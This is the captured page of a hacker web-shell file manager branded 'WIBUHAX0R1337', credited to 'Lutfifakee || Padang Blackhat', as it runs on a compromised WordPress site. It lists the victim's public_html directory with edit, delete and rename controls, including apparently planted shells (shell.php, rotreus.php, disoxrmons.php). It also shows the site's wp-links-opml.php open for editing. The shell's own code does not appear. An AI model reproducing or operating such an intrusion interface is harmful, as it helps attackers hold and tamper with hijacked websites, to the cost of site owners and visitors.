-
WIBUHAX0R1337
-
/
home
/
cdpivkas
/
public_html
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.tmb
--
NONE
.well-known
--
NONE
.wp-cli
--
NONE
cgi-bin
--
NONE
clanicdpivka
--
NONE
dok
--
NONE
e
--
NONE
images
--
NONE
meta
--
NONE
wp
--
NONE
wp-admin
--
NONE
wp-content
--
NONE
wp-includes
--
NONE
.htaccess
0.199KB
Edit File
Delete File
Rename
about.php
3.694KB
Edit File
Delete File
Rename
admin.php
77.432KB
Edit File
Delete File
Rename
breaking_bad.php
6.026KB
Edit File
Delete File
Rename
disoxrmons.php
97.196KB
Edit File
Delete File
Rename
e.zip
0.238KB
Edit File
Delete File
Rename
error_log
17.25MB
Edit File
Delete File
Rename
index.txt
6.074KB
Edit File
Delete File
Rename
license.txt
19.448KB
Edit File
Delete File
Rename
readme.html
7.235KB
Edit File
Delete File
Rename
robots.txt
0.748KB
Edit File
Delete File
Rename
rotreus.php
97.196KB
Edit File
Delete File
Rename
shell.php
0.158KB
Edit File
Delete File
Rename
webcdl.zip
225.78MB
Edit File
Delete File
Rename
wp-activate.php
7.214KB
Edit File
Delete File
Rename
wp-blog-header.php
0.343KB
Edit File
Delete File
Rename
wp-comments-post.php
2.269KB
Edit File
Delete File
Rename
wp-config-sample.php
3.258KB
Edit File
Delete File
Rename
wp-config.php
3.216KB
Edit File
Delete File
Rename
wp-cron.php
5.485KB
Edit File
Delete File
Rename
wp-extends.php
0KB
Edit File
Delete File
Rename
wp-links-opml.php
2.443KB
Edit File
Delete File
Rename
wp-load.php
3.845KB
Edit File
Delete File
Rename
wp-login.php
50.163KB
Edit File
Delete File
Rename
wp-mail.php
8.343KB
Edit File
Delete File
Rename
wp-settings.php
28.352KB
Edit File
Delete File
Rename
wp-signup.php
33.579KB
Edit File
Delete File
Rename
wp-trackback.php
4.982KB
Edit File
Delete File
Rename
xmlrpc.php
3.17KB
Edit File
Delete File
Rename
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( (string) urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat